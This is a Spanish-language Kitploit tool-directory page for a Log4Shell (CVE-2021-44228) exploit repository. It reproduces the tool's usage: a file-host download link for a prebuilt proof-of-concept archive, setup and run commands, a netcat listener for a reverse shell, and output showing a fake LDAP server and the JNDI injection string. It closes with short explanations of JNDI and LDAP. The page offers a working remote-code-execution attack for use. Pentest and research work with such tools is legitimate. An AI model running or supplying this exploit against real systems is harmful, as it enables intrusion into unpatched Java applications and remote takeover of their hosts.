Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Log4j-Exploit-CVE-2021-44228 — Herramienta de explotación para CVE-2021-44228 (Log4Shell) que configura un servidor LDAP malicioso y entrega una carga útil Java para lograr ejecución remota de código en aplicaciones Log4j vulnerables. | Kitploit
Herramientas/GitHubGitHub/willian-2-0-0-1/log4j-exploit-cve-2021-44228
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y Control
GitHubwillian-2-0-0-1/log4j-exploit-cve-2021-44228

Log4j-Exploit-CVE-2021-44228

Herramienta de explotación para CVE-2021-44228 (Log4Shell) que configura un servidor LDAP malicioso y entrega una carga útil Java para lograr ejecución remota de código en aplicaciones Log4j vulnerables.

Ver Repositorio
1hace 4 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Log4j-Exploit-CVE-2021-44228

Herramienta de prueba de vulnerabilidad Log4Shell https://log4shell.tools/

Exploit con Java ya incluido, para evitar crear cuenta, etc.

root@kitploit:~
http://www.mediafire.com/file/bs1spnysc6fbz1a/log4j-shell-poc_%25281%2529.zip/file
root@kitploit:~
pip install -r requirements.txt
root@kitploit:~
$ python3 poc.py --userip localhost --webport 8000 --lport 9001
root@kitploit:~
nc -lvnp 9001
root@kitploit:~
$ python3 poc.py --userip localhost --webport 8000 --lport 9001

[!] CVE: CVE-2021-44228
[!] Github repo: https://github.com/kozmer/log4j-shell-poc

[+] Exploit java class created success
[+] Setting up fake LDAP server

[+] Send me: ${jndi:ldap://localhost:1389/a}

Listening on 0.0.0.0:1389

Concepto básico de log4j

¿Qué es JNDI?

Es una interfaz, una API de Java para un servicio de directorio que permite a los clientes de software Java descubrir y buscar datos y recursos mediante un nombre.

¿Qué es LDAP?

Es un protocolo de acceso al directorio. LDAP puede usarse para validar nombres de usuario y contraseñas con servidores Docker, Jenkins, Kubernetes, Open VPN y Linux Samba. El inicio de sesión único LDAP también puede ser utilizado por administradores del sistema para controlar el acceso a una base de datos LDAP.

PARA QUIÉN QUIERA SABER MÁS SOBRE LA FALLA, SIGUE EL DOCUMENTO ABAJO:

https://www.lunasec.io/docs/blog/log4j-zero-day/

EXPLOIT SIN JAVA INCLUIDO

https://github.com/kozmer/log4j-shell-poc
Descargar herramienta